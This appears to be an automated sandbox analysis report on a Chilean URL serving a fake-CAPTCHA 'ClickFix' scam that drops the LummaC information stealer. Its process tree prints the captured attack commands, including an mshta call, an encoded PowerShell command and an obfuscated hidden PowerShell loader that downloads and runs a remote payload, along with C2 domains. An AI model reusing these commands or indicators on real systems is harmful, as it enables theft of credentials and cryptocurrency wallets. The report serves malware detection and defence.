Edit tour
Windows
Analysis Report
https://patiooutletmaipu.cl/tiendas/head/
Overview
General Information
| Sample URL: | https://patiooutletmaipu.cl/tiendas/head/ |
| Analysis ID: | 1588103 |
| Infos: |   |
 | |
Detection
LummaC, CAPTCHA Scam ClickFix, LummaC Stealer
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detect drive by download via clipboard copy & paste
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
Yara detected LummaC Stealer
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTML page contains hidden javascript code
HTML page contains obfuscated script src
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64_ra
chrome.exe (PID: 6836 cmdline: "C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "about :blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) - chrome.exe (PID: 7060 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2200 --fi eld-trial- handle=194 4,i,617957 0645795824 740,238352 3467287587 005,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
- chrome.exe (PID: 1632 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://patio outletmaip u.cl/tiend as/head/" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
mshta.exe (PID: 7780 cmdline: "C:\Window s\system32 \mshta.exe " https:// solve.bogx .org/awjsx .captcha?u =94e37336- e4b6-4f92- a196-add1c 5c06323 # ? ''I am n ot a robot - reCAPTC HA Verific ation ID: 9977'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) 
powershell.exe (PID: 7936 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -Enc UwB0AGEAcg B0AC0AUABy AG8AYwBlAH MAcwAgACIA QwA6AFwAVw BpAG4AZABv AHcAcwBcAF MAeQBzAFcA bwB3ADYANA BcAFcAaQBu AGQAbwB3AH MAUABvAHcA ZQByAFMAaA BlAGwAbABc AHYAMQAuAD AAXABwAG8A dwBlAHIAcw BoAGUAbABs AC4AZQB4AG UAIgAgAC0A VwBpAG4AZA BvAHcAUwB0 AHkAbABlAC AASABpAGQA ZABlAG4AIA AtAEEAcgBn AHUAbQBlAG 4AdABMAGkA cwB0ACAAJw AtAHcAJwAs ACcAaABpAG QAZABlAG4A JwAsACcALQ BlAHAAJwAs ACcAYgB5AH AAYQBzAHMA JwAsACcALQ BuAG8AcAAn ACwAJwAtAE MAbwBtAG0A YQBuAGQAJw AsACcAZwBk AHIAIAAtAC oAOwBTAGUA dAAtAFYAYQ ByAGkAYQBi AGwAZQAgAE MAaQBVACAA KAAuACQARQ B4AGUAYwB1 AHQAaQBvAG 4AQwBvAG4A dABlAHgAdA AuACgAKAAk AEUAeABlAG MAdQB0AGkA bwBuAEMAbw BuAHQAZQB4 AHQAfABNAG UAbQBiAGUA cgApAFsANg BdAC4ATgBh AG0AZQApAC 4AKAAoACQA RQB4AGUAYw B1AHQAaQBv AG4AQwBvAG 4AdABlAHgA dAAuACgAKA AkAEUAeABl AGMAdQB0AG kAbwBuAEMA bwBuAHQAZQ B4AHQAfABN AGUAbQBiAG UAcgApAFsA NgBdAC4ATg BhAG0AZQAp AHwATQBlAG 0AYgBlAHIA fABXAGgAZQ ByAGUALQBP AGIAagBlAG MAdAB7ACQA XwAuAE4AYQ BtAGUALQBs AGkAawBlAC cAJwAqAHQA KgBvAG0AKg BkACcAJwB9 ACkALgBOAG EAbQBlACkA LgBJAG4Adg BvAGsAZQAo ACQARQB4AG UAYwB1AHQA aQBvAG4AQw BvAG4AdABl AHgAdAAuAC gAKAAkAEUA eABlAGMAdQ B0AGkAbwBu AEMAbwBuAH QAZQB4AHQA fABNAGUAbQ BiAGUAcgAp AFsANgBdAC 4ATgBhAG0A ZQApAC4AKA AoACQARQB4 AGUAYwB1AH QAaQBvAG4A QwBvAG4AdA BlAHgAdAAu ACgAKAAkAE UAeABlAGMA dQB0AGkAbw BuAEMAbwBu AHQAZQB4AH QAfABNAGUA bQBiAGUAcg ApAFsANgBd AC4ATgBhAG 0AZQApAC4A UABzAE8AYg BqAGUAYwB0 AC4ATQBlAH QAaABvAGQA cwB8AFcAaA BlAHIAZQAt AE8AYgBqAG UAYwB0AHsA JABfAC4ATg BhAG0AZQAt AGwAaQBrAG UAJwAnACoA bwBtACoAZQ AnACcAfQAp AC4ATgBhAG 0AZQApAC4A SQBuAHYAbw BrAGUAKAAn ACcATgAqAC 0ATwAqACcA JwAsACQAVA BSAFUARQAs ACQAVABSAF UARQApACwA WwBNAGEAbg BhAGcAZQBt AGUAbgB0AC 4AQQB1AHQA bwBtAGEAdA BpAG8AbgAu AEMAbwBtAG 0AYQBuAGQA VAB5AHAAZQ BzAF0AOgA6 AEMAbQBkAG wAZQB0ACkA TgBlAHQALg BXAGUAYgBD AGwAaQBlAG 4AdAApADsA UwBlAHQALQ BJAHQAZQBt ACAAVgBhAH IAaQBhAGIA bABlADoALw BsAFcAIAAn ACcAaAB0AH QAcABzADoA LwAvAGQAMQ AuAGUAeABw AGwAbwByAG UAZABhAGkA cgB5AGEAcA B0AGkAdAB1 AGQAZQAuAH MAaABvAHAA LwBzAGgALg BiAGkAbgAn ACcAOwBbAF MAYwByAGkA cAB0AEIAbA BvAGMAawBd ADoAOgBDAH IAZQBhAHQA ZQAoACgARw BJACAAVgBh AHIAaQBhAG IAbABlADoA QwBpAFUAKQ AuAFYAYQBs AHUAZQAuAC gAKAAoACgA RwBJACAAVg BhAHIAaQBh AGIAbABlAD oAQwBpAFUA KQAuAFYAYQ BsAHUAZQB8 AE0AZQBtAG IAZQByACkA fABXAGgAZQ ByAGUALQBP AGIAagBlAG MAdAB7ACQA XwAuAE4AYQ BtAGUALQBs AGkAawBlAC cAJwAqAG4A bAAqAGcAJw AnAH0AKQAu AE4AYQBtAG UAKQAuAEkA bgB2AG8Aaw BlACgAKABW AGEAcgBpAG EAYgBsAGUA IABsAFcAKQ AuAFYAYQBs AHUAZQApAC kALgBJAG4A dgBvAGsAZQ BSAGUAdAB1 AHIAbgBBAH MASQBzACgA KQAnAA== MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 7944 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8096 cmdline:
"C:\Window s\SysWow64 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden -ep bypass -nop -Com mand gdr - *;Set-Vari able CiU ( .$Executio nContext.( ($Executio nContext|M ember)[6]. Name).(($E xecutionCo ntext.(($E xecutionCo ntext|Memb er)[6].Nam e)|Member| Where-Obje ct{$_.Name -like'*t*o m*d'}).Nam e).Invoke( $Execution Context.(( $Execution Context|Me mber)[6].N ame).(($Ex ecutionCon text.(($Ex ecutionCon text|Membe r)[6].Name ).PsObject .Methods|W here-Objec t{$_.Name- like'*om*e '}).Name). Invoke('N* -O*',$TRUE ,$TRUE),[M anagement. Automation .CommandTy pes]::Cmdl et)Net.Web Client);Se t-Item Var iable:/lW 'https://d 1.explored airyaptitu de.shop/sh .bin';[Scr iptBlock]: :Create((G I Variable :CiU).Valu e.((((GI V ariable:Ci U).Value|M ember)|Whe re-Object{ $_.Name-li ke'*nl*g'} ).Name).In voke((Vari able lW).V alue)).Inv okeReturnA sIs() MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 8104 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5932 cmdline:
"C:\Window s\SysWow64 \WindowsPo werShell\v 1.0\powers hell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
{"C2 url": ["truculengisau.biz", "marketlumpe.biz", "nuttyshopr.biz", "grandiouseziu.biz", "fraggielek.biz", "beliefbidu.cyou", "littlenotii.biz", "punishzement.biz", "spookycappy.biz"], "Build id": "jMw1IE--SHELLS"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security | ||
| JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security | ||
| JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: | ||